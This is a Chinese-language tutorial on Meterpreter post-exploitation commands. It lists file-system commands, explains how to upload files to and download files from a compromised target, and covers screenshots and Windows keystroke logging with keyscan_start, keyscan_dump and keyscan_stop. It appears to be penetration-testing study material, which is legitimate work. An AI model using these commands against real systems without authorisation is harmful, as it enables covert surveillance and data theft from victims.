在通过木马或者漏洞获得靶机的远程控制权后接下来就是后渗透的过程了,meterpreter可以看作一个支持多操作平台的高级后门工具,可以实现特权提升、信息攫取、系统监控、跳板攻击与内网拓展等多样化的功能特性。
一、访问文件系统
对于文件系统的访问有如下常见指令:可以看出如果是对攻击机进行操作大多数比对于靶机进行操作多了一个l,大致和linux下的指令没有差别。
cat | 读取文件内容
cd | 切换靶机目录
cp | 复制文件到目标
mv | 移动到目标
chmod | 修改文件权限(比如chmod 777 shell.elf)
del / rm | 删除靶机文件
dir/ls | 打印靶机目录
mkdir | 在靶机上创建目录
rmdir | 删除靶机目录
edit | 编辑文件
getlwd | 打印本地目录 (现在的路径是什么)
getwd | 打印靶机目录
lcd | 更改本地目录
lls | 列出本地目录
lpwd | 打印本地目录
pwd | 打印工作目录
search | 搜索文件 详情search -h
二、上传下载文件
在通过cd进入需要上传文件的目录后,再通过lcd寻找到攻击机中需要上传的文件,接下来通过 upload +文件路径即可将文件上传至目标位置。下载文件同样的方法 download +文件。
首先通过ls来查看靶机目录,确定要放在这个目录下
通过lls和lcd来寻找需要上传的文件,然后上传:
再度查看遍多了相应文件:
三、屏幕截图
screenshot |指令即可。
四、键盘记录
keyscan_start | 启动键盘记录(Windows) |
keyscan_dump | 导出键盘(Windows) |
keyscan_stop | 停止键盘记录(Windows) |
从start开始记录,stop停止,dump为开始到dump为止的记录。
